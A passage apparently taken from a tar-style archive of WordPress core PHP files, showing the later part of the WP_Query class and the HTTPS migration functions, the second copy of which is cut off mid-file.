$this->queried_object = null;
$this->queried_object_id = null;
if ( $this->is_category || $this->is_tag || $this->is_tax ) {
if ( $this->is_category ) {
$cat = $this->get( 'cat' );
$category_name = $this->get( 'category_name' );
if ( $cat ) {
$term = get_term( $cat, 'category' );
} elseif ( $category_name ) {
$term = get_term_by( 'slug', $category_name, 'category' );
}
} elseif ( $this->is_tag ) {
$tag_id = $this->get( 'tag_id' );
$tag = $this->get( 'tag' );
if ( $tag_id ) {
$term = get_term( $tag_id, 'post_tag' );
} elseif ( $tag ) {
$term = get_term_by( 'slug', $tag, 'post_tag' );
}
} else {
// For other tax queries, grab the first term from the first clause.
if ( ! empty( $this->tax_query->queried_terms ) ) {
$queried_taxonomies = array_keys( $this->tax_query->queried_terms );
$matched_taxonomy = reset( $queried_taxonomies );
$query = $this->tax_query->queried_terms[ $matched_taxonomy ];
if ( ! empty( $query['terms'] ) ) {
if ( 'term_id' === $query['field'] ) {
$term = get_term( reset( $query['terms'] ), $matched_taxonomy );
} else {
$term = get_term_by( $query['field'], reset( $query['terms'] ), $matched_taxonomy );
}
}
}
}
if ( ! empty( $term ) && ! is_wp_error( $term ) ) {
$this->queried_object = $term;
$this->queried_object_id = (int) $term->term_id;
if ( $this->is_category && 'category' === $this->queried_object->taxonomy ) {
_make_cat_compat( $this->queried_object );
}
}
} elseif ( $this->is_post_type_archive ) {
$post_type = $this->get( 'post_type' );
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$this->queried_object = get_post_type_object( $post_type );
} elseif ( $this->is_posts_page ) {
$page_for_posts = get_option( 'page_for_posts' );
$this->queried_object = get_post( $page_for_posts );
$this->queried_object_id = (int) $this->queried_object->ID;
} elseif ( $this->is_singular && ! empty( $this->post ) ) {
$this->queried_object = $this->post;
$this->queried_object_id = (int) $this->post->ID;
} elseif ( $this->is_author ) {
$author = (int) $this->get( 'author' );
$author_name = $this->get( 'author_name' );
if ( $author ) {
$this->queried_object_id = $author;
} elseif ( $author_name ) {
$user = get_user_by( 'slug', $author_name );
if ( $user ) {
$this->queried_object_id = $user->ID;
}
}
$this->queried_object = get_userdata( $this->queried_object_id );
}
return $this->queried_object;
}
/**
* Retrieves the ID of the currently queried object.
*
* @since 1.5.0
*
* @return int
*/
public function get_queried_object_id() {
$this->get_queried_object();
if ( isset( $this->queried_object_id ) ) {
return $this->queried_object_id;
}
return 0;
}
/**
* Constructor.
*
* Sets up the WordPress query, if parameter is not empty.
*
* @since 1.5.0
*
* @see WP_Query::parse_query() for all available arguments.
*
* @param string|array $query URL query string or array of vars.
*/
public function __construct( $query = '' ) {
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Makes private properties readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Property to get.
* @return mixed Property.
*/
public function __get( $name ) {
if ( in_array( $name, $this->compat_fields, true ) ) {
return $this->$name;
}
}
/**
* Makes private properties checkable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Property to check if set.
* @return bool Whether the property is set.
*/
public function __isset( $name ) {
if ( in_array( $name, $this->compat_fields, true ) ) {
return isset( $this->$name );
}
return false;
}
/**
* Makes private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return mixed|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( in_array( $name, $this->compat_methods, true ) ) {
return $this->$name( ...$arguments );
}
return false;
}
/**
* Determines whether the query is for an existing archive page.
*
* Archive pages include category, tag, author, date, custom post type,
* and custom taxonomy based archives.
*
* @since 3.1.0
*
* @see WP_Query::is_category()
* @see WP_Query::is_tag()
* @see WP_Query::is_author()
* @see WP_Query::is_date()
* @see WP_Query::is_post_type_archive()
* @see WP_Query::is_tax()
*
* @return bool Whether the query is for an existing archive page.
*/
public function is_archive() {
return (bool) $this->is_archive;
}
/**
* Determines whether the query is for an existing post type archive page.
*
* @since 3.1.0
*
* @param string|string[] $post_types Optional. Post type or array of posts types
* to check against. Default empty.
* @return bool Whether the query is for an existing post type archive page.
*/
public function is_post_type_archive( $post_types = '' ) {
if ( empty( $post_types ) || ! $this->is_post_type_archive ) {
return (bool) $this->is_post_type_archive;
}
$post_type = $this->get( 'post_type' );
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$post_type_object = get_post_type_object( $post_type );
if ( ! $post_type_object ) {
return false;
}
return in_array( $post_type_object->name, (array) $post_types, true );
}
/**
* Determines whether the query is for an existing attachment page.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $attachment Optional. Attachment ID, title, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing attachment page.
*/
public function is_attachment( $attachment = '' ) {
if ( ! $this->is_attachment ) {
return false;
}
if ( empty( $attachment ) ) {
return true;
}
$attachment = array_map( 'strval', (array) $attachment );
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
if ( in_array( (string) $post_obj->ID, $attachment, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_title, $attachment, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_name, $attachment, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing author archive page.
*
* If the $author parameter is specified, this function will additionally
* check if the query is for one of the authors specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $author Optional. User ID, nickname, nicename, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing author archive page.
*/
public function is_author( $author = '' ) {
if ( ! $this->is_author ) {
return false;
}
if ( empty( $author ) ) {
return true;
}
$author_obj = $this->get_queried_object();
if ( ! $author_obj ) {
return false;
}
$author = array_map( 'strval', (array) $author );
if ( in_array( (string) $author_obj->ID, $author, true ) ) {
return true;
} elseif ( in_array( $author_obj->nickname, $author, true ) ) {
return true;
} elseif ( in_array( $author_obj->user_nicename, $author, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing category archive page.
*
* If the $category parameter is specified, this function will additionally
* check if the query is for one of the categories specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $category Optional. Category ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing category archive page.
*/
public function is_category( $category = '' ) {
if ( ! $this->is_category ) {
return false;
}
if ( empty( $category ) ) {
return true;
}
$cat_obj = $this->get_queried_object();
if ( ! $cat_obj ) {
return false;
}
$category = array_map( 'strval', (array) $category );
if ( in_array( (string) $cat_obj->term_id, $category, true ) ) {
return true;
} elseif ( in_array( $cat_obj->name, $category, true ) ) {
return true;
} elseif ( in_array( $cat_obj->slug, $category, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing tag archive page.
*
* If the $tag parameter is specified, this function will additionally
* check if the query is for one of the tags specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $tag Optional. Tag ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing tag archive page.
*/
public function is_tag( $tag = '' ) {
if ( ! $this->is_tag ) {
return false;
}
if ( empty( $tag ) ) {
return true;
}
$tag_obj = $this->get_queried_object();
if ( ! $tag_obj ) {
return false;
}
$tag = array_map( 'strval', (array) $tag );
if ( in_array( (string) $tag_obj->term_id, $tag, true ) ) {
return true;
} elseif ( in_array( $tag_obj->name, $tag, true ) ) {
return true;
} elseif ( in_array( $tag_obj->slug, $tag, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing custom taxonomy archive page.
*
* If the $taxonomy parameter is specified, this function will additionally
* check if the query is for that specific $taxonomy.
*
* If the $term parameter is specified in addition to the $taxonomy parameter,
* this function will additionally check if the query is for one of the terms
* specified.
*
* @since 3.1.0
*
* @global WP_Taxonomy[] $wp_taxonomies Registered taxonomies.
*
* @param string|string[] $taxonomy Optional. Taxonomy slug or slugs to check against.
* Default empty.
* @param int|string|int[]|string[] $term Optional. Term ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing custom taxonomy archive page.
* True for custom taxonomy archive pages, false for built-in taxonomies
* (category and tag archives).
*/
public function is_tax( $taxonomy = '', $term = '' ) {
global $wp_taxonomies;
if ( ! $this->is_tax ) {
return false;
}
if ( empty( $taxonomy ) ) {
return true;
}
$queried_object = $this->get_queried_object();
$tax_array = array_intersect( array_keys( $wp_taxonomies ), (array) $taxonomy );
$term_array = (array) $term;
// Check that the taxonomy matches.
if ( ! ( isset( $queried_object->taxonomy ) && count( $tax_array ) && in_array( $queried_object->taxonomy, $tax_array, true ) ) ) {
return false;
}
// Only a taxonomy provided.
if ( empty( $term ) ) {
return true;
}
return isset( $queried_object->term_id ) &&
count(
array_intersect(
array( $queried_object->term_id, $queried_object->name, $queried_object->slug ),
$term_array
)
);
}
/**
* Determines whether the current URL is within the comments popup window.
*
* @since 3.1.0
* @deprecated 4.5.0
*
* @return false Always returns false.
*/
public function is_comments_popup() {
_deprecated_function( __FUNCTION__, '4.5.0' );
return false;
}
/**
* Determines whether the query is for an existing date archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing date archive.
*/
public function is_date() {
return (bool) $this->is_date;
}
/**
* Determines whether the query is for an existing day archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing day archive.
*/
public function is_day() {
return (bool) $this->is_day;
}
/**
* Determines whether the query is for a feed.
*
* @since 3.1.0
*
* @param string|string[] $feeds Optional. Feed type or array of feed types
* to check against. Default empty.
* @return bool Whether the query is for a feed.
*/
public function is_feed( $feeds = '' ) {
if ( empty( $feeds ) || ! $this->is_feed ) {
return (bool) $this->is_feed;
}
$query_var = $this->get( 'feed' );
if ( 'feed' === $query_var ) {
$query_var = get_default_feed();
}
return in_array( $query_var, (array) $feeds, true );
}
/**
* Determines whether the query is for a comments feed.
*
* @since 3.1.0
*
* @return bool Whether the query is for a comments feed.
*/
public function is_comment_feed() {
return (bool) $this->is_comment_feed;
}
/**
* Determines whether the query is for the front page of the site.
*
* This is for what is displayed at your site's main URL.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_on_front'.
*
* If you set a static page for the front page of your site, this function will return
* true when viewing that page.
*
* Otherwise the same as {@see WP_Query::is_home()}.
*
* @since 3.1.0
*
* @return bool Whether the query is for the front page of the site.
*/
public function is_front_page() {
// Most likely case.
if ( 'posts' === get_option( 'show_on_front' ) && $this->is_home() ) {
return true;
} elseif ( 'page' === get_option( 'show_on_front' ) && get_option( 'page_on_front' )
&& $this->is_page( get_option( 'page_on_front' ) )
) {
return true;
} else {
return false;
}
}
/**
* Determines whether the query is for the blog homepage.
*
* This is the page which shows the time based blog content of your site.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_for_posts'.
*
* If you set a static page for the front page of your site, this function will return
* true only on the page you set as the "Posts page".
*
* @since 3.1.0
*
* @see WP_Query::is_front_page()
*
* @return bool Whether the query is for the blog homepage.
*/
public function is_home() {
return (bool) $this->is_home;
}
/**
* Determines whether the query is for the Privacy Policy page.
*
* This is the page which shows the Privacy Policy content of your site.
*
* Depends on the site's "Change your Privacy Policy page" Privacy Settings 'wp_page_for_privacy_policy'.
*
* This function will return true only on the page you set as the "Privacy Policy page".
*
* @since 5.2.0
*
* @return bool Whether the query is for the Privacy Policy page.
*/
public function is_privacy_policy() {
if ( get_option( 'wp_page_for_privacy_policy' )
&& $this->is_page( get_option( 'wp_page_for_privacy_policy' ) )
) {
return true;
} else {
return false;
}
}
/**
* Determines whether the query is for an existing month archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing month archive.
*/
public function is_month() {
return (bool) $this->is_month;
}
/**
* Determines whether the query is for an existing single page.
*
* If the $page parameter is specified, this function will additionally
* check if the query is for one of the pages specified.
*
* @since 3.1.0
*
* @see WP_Query::is_single()
* @see WP_Query::is_singular()
*
* @param int|string|int[]|string[] $page Optional. Page ID, title, slug, path, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing single page.
*/
public function is_page( $page = '' ) {
if ( ! $this->is_page ) {
return false;
}
if ( empty( $page ) ) {
return true;
}
$page_obj = $this->get_queried_object();
if ( ! $page_obj ) {
return false;
}
$page = array_map( 'strval', (array) $page );
if ( in_array( (string) $page_obj->ID, $page, true ) ) {
return true;
} elseif ( in_array( $page_obj->post_title, $page, true ) ) {
return true;
} elseif ( in_array( $page_obj->post_name, $page, true ) ) {
return true;
} else {
foreach ( $page as $pagepath ) {
if ( ! strpos( $pagepath, '/' ) ) {
continue;
}
$pagepath_obj = get_page_by_path( $pagepath );
if ( $pagepath_obj && ( $pagepath_obj->ID === $page_obj->ID ) ) {
return true;
}
}
}
return false;
}
/**
* Determines whether the query is for a paged result and not for the first page.
*
* @since 3.1.0
*
* @return bool Whether the query is for a paged result.
*/
public function is_paged() {
return (bool) $this->is_paged;
}
/**
* Determines whether the query is for a post or page preview.
*
* @since 3.1.0
*
* @return bool Whether the query is for a post or page preview.
*/
public function is_preview() {
return (bool) $this->is_preview;
}
/**
* Determines whether the query is for the robots.txt file.
*
* @since 3.1.0
*
* @return bool Whether the query is for the robots.txt file.
*/
public function is_robots() {
return (bool) $this->is_robots;
}
/**
* Determines whether the query is for the favicon.ico file.
*
* @since 5.4.0
*
* @return bool Whether the query is for the favicon.ico file.
*/
public function is_favicon() {
return (bool) $this->is_favicon;
}
/**
* Determines whether the query is for a search.
*
* @since 3.1.0
*
* @return bool Whether the query is for a search.
*/
public function is_search() {
return (bool) $this->is_search;
}
/**
* Determines whether the query is for an existing single post.
*
* Works for any post type excluding pages.
*
* If the $post parameter is specified, this function will additionally
* check if the query is for one of the Posts specified.
*
* @since 3.1.0
*
* @see WP_Query::is_page()
* @see WP_Query::is_singular()
*
* @param int|string|int[]|string[] $post Optional. Post ID, title, slug, path, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing single post.
*/
public function is_single( $post = '' ) {
if ( ! $this->is_single ) {
return false;
}
if ( empty( $post ) ) {
return true;
}
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
$post = array_map( 'strval', (array) $post );
if ( in_array( (string) $post_obj->ID, $post, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_title, $post, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_name, $post, true ) ) {
return true;
} else {
foreach ( $post as $postpath ) {
if ( ! strpos( $postpath, '/' ) ) {
continue;
}
$postpath_obj = get_page_by_path( $postpath, OBJECT, $post_obj->post_type );
if ( $postpath_obj && ( $postpath_obj->ID === $post_obj->ID ) ) {
return true;
}
}
}
return false;
}
/**
* Determines whether the query is for an existing single post of any post type
* (post, attachment, page, custom post types).
*
* If the $post_types parameter is specified, this function will additionally
* check if the query is for one of the Posts Types specified.
*
* @since 3.1.0
*
* @see WP_Query::is_page()
* @see WP_Query::is_single()
*
* @param string|string[] $post_types Optional. Post type or array of post types
* to check against. Default empty.
* @return bool Whether the query is for an existing single post
* or any of the given post types.
*/
public function is_singular( $post_types = '' ) {
if ( empty( $post_types ) || ! $this->is_singular ) {
return (bool) $this->is_singular;
}
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
return in_array( $post_obj->post_type, (array) $post_types, true );
}
/**
* Determines whether the query is for a specific time.
*
* @since 3.1.0
*
* @return bool Whether the query is for a specific time.
*/
public function is_time() {
return (bool) $this->is_time;
}
/**
* Determines whether the query is for a trackback endpoint call.
*
* @since 3.1.0
*
* @return bool Whether the query is for a trackback endpoint call.
*/
public function is_trackback() {
return (bool) $this->is_trackback;
}
/**
* Determines whether the query is for an existing year archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing year archive.
*/
public function is_year() {
return (bool) $this->is_year;
}
/**
* Determines whether the query is a 404 (returns no results).
*
* @since 3.1.0
*
* @return bool Whether the query is a 404 error.
*/
public function is_404() {
return (bool) $this->is_404;
}
/**
* Determines whether the query is for an embedded post.
*
* @since 4.4.0
*
* @return bool Whether the query is for an embedded post.
*/
public function is_embed() {
return (bool) $this->is_embed;
}
/**
* Determines whether the query is the main query.
*
* @since 3.3.0
*
* @global WP_Query $wp_the_query WordPress Query object.
*
* @return bool Whether the query is the main query.
*/
public function is_main_query() {
global $wp_the_query;
return $wp_the_query === $this;
}
/**
* Sets up global post data.
*
* @since 4.1.0
* @since 4.4.0 Added the ability to pass a post ID to `$post`.
*
* @global int $id
* @global WP_User $authordata
* @global string $currentday
* @global string $currentmonth
* @global int $page
* @global array $pages
* @global int $multipage
* @global int $more
* @global int $numpages
*
* @param WP_Post|object|int $post WP_Post instance or Post ID/object.
* @return true True when finished.
*/
public function setup_postdata( $post ) {
global $id, $authordata, $currentday, $currentmonth, $page, $pages, $multipage, $more, $numpages;
if ( ! ( $post instanceof WP_Post ) ) {
$post = get_post( $post );
}
if ( ! $post ) {
return;
}
$elements = $this->generate_postdata( $post );
if ( false === $elements ) {
return;
}
$id = $elements['id'];
$authordata = $elements['authordata'];
$currentday = $elements['currentday'];
$currentmonth = $elements['currentmonth'];
$page = $elements['page'];
$pages = $elements['pages'];
$multipage = $elements['multipage'];
$more = $elements['more'];
$numpages = $elements['numpages'];
/**
* Fires once the post data has been set up.
*
* @since 2.8.0
* @since 4.1.0 Introduced `$query` parameter.
*
* @param WP_Post $post The Post object (passed by reference).
* @param WP_Query $query The current Query object (passed by reference).
*/
do_action_ref_array( 'the_post', array( &$post, &$this ) );
return true;
}
/**
* Generates post data.
*
* @since 5.2.0
*
* @param WP_Post|object|int $post WP_Post instance or Post ID/object.
* @return array|false Elements of post or false on failure.
*/
public function generate_postdata( $post ) {
if ( ! ( $post instanceof WP_Post ) ) {
$post = get_post( $post );
}
if ( ! $post ) {
return false;
}
$id = (int) $post->ID;
$authordata = get_userdata( $post->post_author );
$currentday = false;
$currentmonth = false;
$post_date = $post->post_date;
if ( ! empty( $post_date ) && '0000-00-00 00:00:00' !== $post_date ) {
// Avoid using mysql2date for performance reasons.
$currentmonth = substr( $post_date, 5, 2 );
$day = substr( $post_date, 8, 2 );
$year = substr( $post_date, 2, 2 );
$currentday = sprintf( '%s.%s.%s', $day, $currentmonth, $year );
}
$numpages = 1;
$multipage = 0;
$page = $this->get( 'page' );
if ( ! $page ) {
$page = 1;
}
/*
* Force full post content when viewing the permalink for the $post,
* or when on an RSS feed. Otherwise respect the 'more' tag.
*/
if ( get_queried_object_id() === $post->ID && ( $this->is_page() || $this->is_single() ) ) {
$more = 1;
} elseif ( $this->is_feed() ) {
$more = 1;
} else {
$more = 0;
}
$content = $post->post_content;
if ( str_contains( $content, '<!--nextpage-->' ) ) {
$content = str_replace( "\n<!--nextpage-->\n", '<!--nextpage-->', $content );
$content = str_replace( "\n<!--nextpage-->", '<!--nextpage-->', $content );
$content = str_replace( "<!--nextpage-->\n", '<!--nextpage-->', $content );
// Remove the nextpage block delimiters, to avoid invalid block structures in the split content.
$content = str_replace( '<!-- wp:nextpage -->', '', $content );
$content = str_replace( '<!-- /wp:nextpage -->', '', $content );
// Ignore nextpage at the beginning of the content.
if ( str_starts_with( $content, '<!--nextpage-->' ) ) {
$content = substr( $content, 15 );
}
$pages = explode( '<!--nextpage-->', $content );
} else {
$pages = array( $post->post_content );
}
/**
* Filters the "pages" derived from splitting the post content.
*
* "Pages" are determined by splitting the post content based on the presence
* of `<!-- nextpage -->` tags.
*
* @since 4.4.0
*
* @param string[] $pages Array of "pages" from the post content split by `<!-- nextpage -->` tags.
* @param WP_Post $post Current post object.
*/
$pages = apply_filters( 'content_pagination', $pages, $post );
$numpages = count( $pages );
if ( $numpages > 1 ) {
if ( $page > 1 ) {
$more = 1;
}
$multipage = 1;
} else {
$multipage = 0;
}
$elements = compact( 'id', 'authordata', 'currentday', 'currentmonth', 'page', 'pages', 'multipage', 'more', 'numpages' );
return $elements;
}
/**
* Generates cache key.
*
* @since 6.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args Query arguments.
* @param string $sql SQL statement.
* @return string Cache key.
*/
protected function generate_cache_key( array $args, $sql ) {
global $wpdb;
unset(
$args['cache_results'],
$args['fields'],
$args['lazy_load_term_meta'],
$args['update_post_meta_cache'],
$args['update_post_term_cache'],
$args['update_menu_item_cache'],
$args['suppress_filters']
);
if ( empty( $args['post_type'] ) ) {
if ( $this->is_attachment ) {
$args['post_type'] = 'attachment';
} elseif ( $this->is_page ) {
$args['post_type'] = 'page';
} else {
$args['post_type'] = 'post';
}
} elseif ( 'any' === $args['post_type'] ) {
$args['post_type'] = array_values( get_post_types( array( 'exclude_from_search' => false ) ) );
}
$args['post_type'] = (array) $args['post_type'];
// Sort post types to ensure same cache key generation.
sort( $args['post_type'] );
/*
* Sort arrays that can be used for ordering prior to cache key generation.
*
* These arrays are sorted in the query generator for the purposes of the
* WHERE clause but the arguments are not modified as they can be used for
* the orderby clause.
*
* Their use in the orderby clause will generate a different SQL query so
* they can be sorted for the cache key generation.
*/
$sortable_arrays_with_int_values = array(
'post__in',
'post_parent__in',
);
foreach ( $sortable_arrays_with_int_values as $key ) {
if ( isset( $args[ $key ] ) && is_array( $args[ $key ] ) ) {
$args[ $key ] = array_unique( array_map( 'absint', $args[ $key ] ) );
sort( $args[ $key ] );
}
}
// Sort and unique the 'post_name__in' for cache key generation.
if ( isset( $args['post_name__in'] ) && is_array( $args['post_name__in'] ) ) {
$args['post_name__in'] = array_unique( $args['post_name__in'] );
sort( $args['post_name__in'] );
}
if ( isset( $args['post_status'] ) ) {
$args['post_status'] = (array) $args['post_status'];
// Sort post status to ensure same cache key generation.
sort( $args['post_status'] );
}
// Add a default orderby value of date to ensure same cache key generation.
if ( ! isset( $args['orderby'] ) ) {
$args['orderby'] = 'date';
}
$placeholder = $wpdb->placeholder_escape();
array_walk_recursive(
$args,
/*
* Replace wpdb placeholders with the string used in the database
* query to avoid unreachable cache keys. This is necessary because
* the placeholder is randomly generated in each request.
*
* $value is passed by reference to allow it to be modified.
* array_walk_recursive() does not return an array.
*/
static function ( &$value ) use ( $wpdb, $placeholder ) {
if ( is_string( $value ) && str_contains( $value, $placeholder ) ) {
$value = $wpdb->remove_placeholder_escape( $value );
}
}
);
ksort( $args );
// Replace wpdb placeholder in the SQL statement used by the cache key.
$sql = $wpdb->remove_placeholder_escape( $sql );
$key = md5( serialize( $args ) . $sql );
$this->query_cache_key = "wp_query:$key";
return $this->query_cache_key;
}
/**
* After looping through a nested query, this function
* restores the $post global to the current post in this query.
*
* @since 3.7.0
*
* @global WP_Post $post Global post object.
*/
public function reset_postdata() {
if ( ! empty( $this->post ) ) {
$GLOBALS['post'] = $this->post;
$this->setup_postdata( $this->post );
}
}
/**
* Lazyloads term meta for posts in the loop.
*
* @since 4.4.0
* @deprecated 4.5.0 See wp_queue_posts_for_term_meta_lazyload().
*
* @param mixed $check
* @param int $term_id
* @return mixed
*/
public function lazyload_term_meta( $check, $term_id ) {
_deprecated_function( __METHOD__, '4.5.0' );
return $check;
}
/**
* Lazyloads comment meta for comments in the loop.
*
* @since 4.4.0
* @deprecated 4.5.0 See wp_lazyload_comment_meta().
*
* @param mixed $check
* @param int $comment_id
* @return mixed
*/
public function lazyload_comment_meta( $check, $comment_id ) {
_deprecated_function( __METHOD__, '4.5.0' );
return $check;
}
}
https-migration-20260606113308.php 0000666 00000011205 15224151221 0011767 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605172929-20260621081210.php 0000666 00000011205 15224151221 0013360 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
